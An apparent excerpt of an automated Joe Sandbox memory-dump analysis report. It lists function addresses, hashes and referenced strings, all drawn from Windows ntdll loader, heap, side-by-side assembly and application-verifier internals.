minkernel\ntdll\ldrinit.c, xrefs: 01493187
MaxDeadActivationContexts, xrefs: 01492D82
UseImpersonatedDeviceMap, xrefs: 0149251C
ShutdownFlags, xrefs: 014924A1
UnloadEventTraceDepth, xrefs: 014924C0
FrontEndHeapDebugOptions, xrefs: 01492489
GlobalFlag, xrefs: 01492F3F, 01493059

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 6831078340ed7eaa33a25aab99300e9900a7e77cf596fe50f12f8c26a539ad65
Instruction ID: 6c2ae6a4d7e966bdaa7e5f9c49059b7b9814d06982575d77943e6ecae968cde2
Opcode Fuzzy Hash: 6831078340ed7eaa33a25aab99300e9900a7e77cf596fe50f12f8c26a539ad65
Instruction Fuzzy Hash: F5928F71604342AFEB21CF29C840F6BBBE8BB94754F04491EFA9597361D7B0E845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01448620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Critical section debug info address, xrefs: 0148541F, 0148552E
undeleted critical section in freed memory, xrefs: 0148542B
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014854E2
Thread identifier, xrefs: 0148553A
Critical section address, xrefs: 01485425, 014854BC, 01485534
double initialized or corrupted critical section, xrefs: 01485508
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014854CE
Address of the debug info found in the active list., xrefs: 014854AE, 014854FA
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0148540A, 01485496, 01485519
Thread is in a state in which it cannot own a critical section, xrefs: 01485543
8, xrefs: 014852E3
corrupted critical section, xrefs: 014854C2
Invalid debug info address of this critical section, xrefs: 014854B6
Critical section address., xrefs: 01485502

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 0c43329ea76a3c0bfe7e5d913d722f16d6e4a7f7521fa64909fdef648fe00abe
Instruction ID: 4b62dbe20165e8499ba96e0ff0d424f476c414607e50ec990eb2d535468b5200
Opcode Fuzzy Hash: 0c43329ea76a3c0bfe7e5d913d722f16d6e4a7f7521fa64909fdef648fe00abe
Instruction Fuzzy Hash: E5819D71A40359AFDB25DF9AC844BAEBBB5FB08714F10415EF604BB3A0D371A945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 014429F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01482409
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014822E4
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01482412
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014825EB
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01482498
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01482506
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01482624
RtlpResolveAssemblyStorageMapEntry, xrefs: 0148261F
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014824C0
@, xrefs: 0148259B
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01482602

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 31d012726b030485760a7e381bffee51dd83fb00c608379c59f1a90490abbc91
Instruction ID: 8217d7f5f26b1368ab7ca5eee53a3452122ad508850409d981ae932bd921d44e
Opcode Fuzzy Hash: 31d012726b030485760a7e381bffee51dd83fb00c608379c59f1a90490abbc91
Instruction Fuzzy Hash: C10290B1D002299BEB31DB55CC80F9EB7B8AF54304F0041EBE609A7261D7B09E84CF69

Uniqueness

Uniqueness Score: -1.00%

Function 014B8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 014B8BD0
csrss.exe, xrefs: 014B8B80
smss.exe, xrefs: 014B8B8B
svchost.exe, xrefs: 014B8B68
heapType, xrefs: 014B8BCB
runtimebroker.exe, xrefs: 014B8B73
services.exe, xrefs: 014B8B96
DefaultBrowser_NOPUBLISHERID, xrefs: 014B8D00
SegmentHeap, xrefs: 014B8BE9
lsass.exe, xrefs: 014B8BA1

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: d7a461b05de77c7ef4968b985a8187a325c8ef3ce30a9d6a8f43504b1730be4f
Instruction ID: 8e3ee1a118eec9513eba0a9f0228acf58528e4e31f523a8e1128ca634bd36755
Opcode Fuzzy Hash: d7a461b05de77c7ef4968b985a8187a325c8ef3ce30a9d6a8f43504b1730be4f
Instruction Fuzzy Hash: 4251C0B11043169BD325DF198884BEBBBECAFA4644F14491FF958C32A1E770D609CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 014C0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to reallocate block at %p to %Ix bytes, xrefs: 014C03BA
HEAP: , xrefs: 014C03A6, 014C04B5, 014C05DD, 014C0682, 014C06D9
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 014C04D3
RtlReAllocateHeap, xrefs: 014C02BF, 014C0362
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 014C069F
HEAP[%wZ]: , xrefs: 014C0399, 014C04A8, 014C05D0, 014C0675, 014C06CC
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 014C06EA
Just reallocated block at %p to %Ix bytes, xrefs: 014C05F1

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 237f4278b233c79954986934e6bddd9a3421fbeb46ad37f088e5eb933cbb0aae
Instruction ID: 32263cd989e315fa3f6f2b87c1d33bbd9c7375125ad54d0acb705b93cdbf51b5
Opcode Fuzzy Hash: 237f4278b233c79954986934e6bddd9a3421fbeb46ad37f088e5eb933cbb0aae
Instruction Fuzzy Hash: B4D1D03D600681DFDB62DFAAC440AAABBF1FF69A04F08806EE5559B362C7349945CB14

Uniqueness

Uniqueness Score: -1.00%

Function 014989B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

HandleTraces, xrefs: 01498C8F
VerifierDlls, xrefs: 01498CBD
VerifierFlags, xrefs: 01498C50
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01498A67
VerifierDebug, xrefs: 01498CA5
AVRF: -*- final list of providers -*- , xrefs: 01498B8F
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01498A3D

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 6483ec82411e03f7f5c1bebf1900a1e11dbf211edacf0e0d691ea30bfea5df73
Instruction ID: a1c6e73a3884622be1140c4c3867333522dd97a781e5b03736cb9103bf7869b8
Opcode Fuzzy Hash: 6483ec82411e03f7f5c1bebf1900a1e11dbf211edacf0e0d691ea30bfea5df73
Instruction Fuzzy Hash: 3B91337260030BAFDB22EFAD8880B1B7FA4AFA5714F05051EFA446F3A1D7709845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0141EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

T, xrefs: 0141EB4E
LdrpResSearchResourceInsideDirectory Enter, xrefs: 0141EB58
R, xrefs: 0141EB62
, xrefs: 0141F299
LdrpResSearchResourceInsideDirectory Exit, xrefs: 0141EB6C
{, xrefs: 01474643

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: a02442c54a46095d7ae8c2618239ef158e78889ed8c737c59952ec45ca48d0cc
Instruction ID: 1812330d3381729cb6044f1fc3ede3cb27bf9891ddf2703bbd91e314a29e60cb
Opcode Fuzzy Hash: a02442c54a46095d7ae8c2618239ef158e78889ed8c737c59952ec45ca48d0cc
Instruction Fuzzy Hash: FBA26074A0562A8FDB65CF19CC887AABBB5BF45314F1442EAD90DA7364DB309E85CF00

Uniqueness

Uniqueness Score: -1.00%

Function 014463FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 014841FE
_LdrpInitialize, xrefs: 014840DF, 01484141, 01484205, 0148425F
Delaying execution failed with status 0x%08lx, xrefs: 01484258
minkernel\ntdll\ldrinit.c, xrefs: 014840E9, 0148414B, 0148420F, 01484269
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 014840D8
Process initialization failed with status 0x%08lx, xrefs: 0148413A

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 1b25143297a9136c6ac77ad9fcfaa259878c9045ff8b05e67beb24c773fc53f5
Instruction ID: b7a228affda02770d02e73140d45df73b7363b0bce37869a84a4c2d63326189f
Opcode Fuzzy Hash: 1b25143297a9136c6ac77ad9fcfaa259878c9045ff8b05e67beb24c773fc53f5
Instruction Fuzzy Hash: B7914A70B00316DBEB26EF99D849BAF7BA1BB11B24F05002FE9106B3B1D7708846C794

Uniqueness

Uniqueness Score: -1.00%

Function 0140645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Getting the shim engine exports failed with status 0x%08lx, xrefs: 01469A01
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01469A2A
minkernel\ntdll\ldrinit.c, xrefs: 01469A11, 01469A3A
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014699ED
LdrpInitShimEngine, xrefs: 014699F4, 01469A07, 01469A30
apphelp.dll, xrefs: 01406496

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: da7db7155b99047a53995353e6fc60e7dae39110652316aba4a49d5f10af7d28
Instruction ID: 01ee58486f23cfe572b2a999cd5999f43456082b97b2c46070bb0d9b2e9c3159
Opcode Fuzzy Hash: da7db7155b99047a53995353e6fc60e7dae39110652316aba4a49d5f10af7d28
Instruction Fuzzy Hash: 8651E271218301DFE722DF26D841A6B77E8FB94648F01052FF5969B2B0D670E908CB93

Uniqueness

Uniqueness Score: -1.00%

Function 01442674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01482178
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0148219F
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014821BF
SXS: %s() passed the empty activation context, xrefs: 01482165
RtlGetAssemblyStorageRoot, xrefs: 01482160, 0148219A, 014821BA
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01482180

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 7a7e5178879be4b67e64a0abcda37860713b6091cb43c6e7a5a26767b46aac80
Instruction ID: f8837935a0db0886546bc661ea444aa0c516eae9d712e9b854fc29ce602f5acb
Opcode Fuzzy Hash: 7a7e5178879be4b67e64a0abcda37860713b6091cb43c6e7a5a26767b46aac80
Instruction Fuzzy Hash: BE31073AB402157BFB21DA9A9C41F5F7F78DF64A94F15005FFB04A7360D6B09A01C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 0144C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Unable to build import redirection Table, Status = 0x%x, xrefs: 014881E5
Loading import redirection DLL: '%wZ', xrefs: 01488170
LdrpInitializeImportRedirection, xrefs: 01488177, 014881EB
minkernel\ntdll\ldrinit.c, xrefs: 0144C6C3
LdrpInitializeProcess, xrefs: 0144C6C4
minkernel\ntdll\ldrredirect.c, xrefs: 01488181, 014881F5

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: fb93a7bf095fc1731631be06b429d5f23355cfcc5e1fe35edac94dc000ae8750
Instruction ID: a41869852b1da3ef3aa640ff0168f802ccb1543a01bdbc82ed02d1e72612e88d
Opcode Fuzzy Hash: fb93a7bf095fc1731631be06b429d5f23355cfcc5e1fe35edac94dc000ae8750
Instruction Fuzzy Hash: FF3111716443029BD324EB6AD986E1BB795AFE4B14F05051EF9456B3A1E630EC08C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0145096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01452DF0: LdrInitializeThunk.NTDLL ref: 01452DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01450BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01450BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01450D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01450D74

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 1dec5f6d85d7d6a58a1f53b32787eef730936838d3dc91f590eaf82ed77e5c87
Instruction ID: 4a92fb46ed0183b66e04e64c8fcd7b44f7d6e1ce975d2ea19e67b15a392b7edf
Opcode Fuzzy Hash: 1dec5f6d85d7d6a58a1f53b32787eef730936838d3dc91f590eaf82ed77e5c87
Instruction Fuzzy Hash: 2C426A75900715DFDB61CF28C880BAAB7F4BF44314F1445AAE989EB352E770AA85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0141A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Exit, xrefs: 0141A3FF
6, xrefs: 0141A3F7
8, xrefs: 0141A3E7
LdrResFallbackLangList Enter, xrefs: 0141A3EF

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 8cbc58f638d9811d86ef7291f5e3a67be370938a09bb4a3ec96c9b52bc0c6808
Instruction ID: a1bfb6ed71f35a2cce48638a0fadb70ffa07b5e90526ff6f534d3781b70a7ddb
Opcode Fuzzy Hash: 8cbc58f638d9811d86ef7291f5e3a67be370938a09bb4a3ec96c9b52bc0c6808
Instruction Fuzzy Hash: E2C189742093828FD711CF58C144BAABBE4BF94704F14486BF9968B369E774CA4ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 01448402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01448421
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0144855E
@, xrefs: 01448591
LdrpInitializeProcess, xrefs: 01448422

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 986f18e0147a3af0a057c47aba2c9f8033767b1f52bf5ed7b0c06469b8b62e19
Instruction ID: d99d20e1fcf019e8ae27e31946987eb48b526e5d72ec558739cd55dfba62e248
Opcode Fuzzy Hash: 986f18e0147a3af0a057c47aba2c9f8033767b1f52bf5ed7b0c06469b8b62e19
Instruction Fuzzy Hash: 61918F71508346AFE721EF66CC40EAFBAE8BF94744F40092FFA8496161E774D944CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0144273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014822B6
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014821D9, 014822B1
.Local, xrefs: 014428D8
SXS: %s() passed the empty activation context, xrefs: 014821DE

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 66ee062c1cce22aa7e8d7509757051e31b61ffd89aa0c1c43e467cd4a8ae5488
Instruction ID: 9598bca63d75a3c6fbaa5c888a5b61d7ad860acc2b57f2cd44c6cc1d7576e90a
Opcode Fuzzy Hash: 66ee062c1cce22aa7e8d7509757051e31b61ffd89aa0c1c43e467cd4a8ae5488
Instruction Fuzzy Hash: 75A1C635A002299BEB25DF59D884FAAB7B0BF58314F1541EBE908A7361D7709E81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01444AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

RtlDeactivateActivationContext, xrefs: 01483425, 01483432, 01483451
SXS: %s() called with invalid flags 0x%08lx, xrefs: 0148342A
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01483456
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01483437

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: d50bab0539787a5177169baf27aa30ea3db42928f3217d70367e4dc711ed8f78
Instruction ID: 5fbf459a89dcffb88217f1beb05dee0777e1de22ef07da729476edd053cf11e8
Opcode Fuzzy Hash: d50bab0539787a5177169baf27aa30ea3db42928f3217d70367e4dc711ed8f78
Instruction Fuzzy Hash: BE6100326407129BE722DF1DC841B2BBBA5BB90F10F19852EE9559B361D734E801CB95

Uniqueness

Uniqueness Score: -1.00%

Function 014164AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01470FE5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0147106B
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01471028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014710AE

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 7aa863bb52210dfb9a7b1dd7865966ea3ad54a8b9a8d726e7f9ed235c72d1f83
Instruction ID: e651f434301a62e8dfd5fdd01d851869e106b28bb666290db8bc5ccc16818953
Opcode Fuzzy Hash: 7aa863bb52210dfb9a7b1dd7865966ea3ad54a8b9a8d726e7f9ed235c72d1f83
Instruction Fuzzy Hash: 5B71E0B19043059FCB21DF15C884B9B7FA8AFA4764F00046EFD498B2AAD374D588CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0143245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 0147A998
minkernel\ntdll\ldrinit.c, xrefs: 0147A9A2
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0147A992
apphelp.dll, xrefs: 01432462

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 0f0af69b8405e093c888343203036004d21fca3571f35390dcc8a9d6a79ca3ae
Instruction ID: 1de5628bb533e0291a691b8a9ed69d8dbf124b4f67ef995da790811cc32e3303
Opcode Fuzzy Hash: 0f0af69b8405e093c888343203036004d21fca3571f35390dcc8a9d6a79ca3ae
Instruction Fuzzy Hash: 24314CB1600202EBDB329F9D9841EAF77B4FF94704F2A002FE9116B365C7B05956D780

Uniqueness

Uniqueness Score: -1.00%

Function 014229A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01423264
HEAP[%wZ]: , xrefs: 01423255
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0142327D

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 4b0fe50202fb2297990fb6044ed62222351b871041e6c7005f6d732a96c22574
Instruction ID: 800d8df90f8afd86a45f99a8fe5d7a8a88b5ed7db78512f0e22ac49fe3a00b2c
Opcode Fuzzy Hash: 4b0fe50202fb2297990fb6044ed62222351b871041e6c7005f6d732a96c22574
Instruction Fuzzy Hash: DA92D0709042699FDB25CF69C440BAEBBF1FF48310F54809EE859AB361D778A986CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01420770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 014750BD
(UCRBlock->Size >= *Size), xrefs: 014750CA
HEAP[%wZ]: , xrefs: 014750AE

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
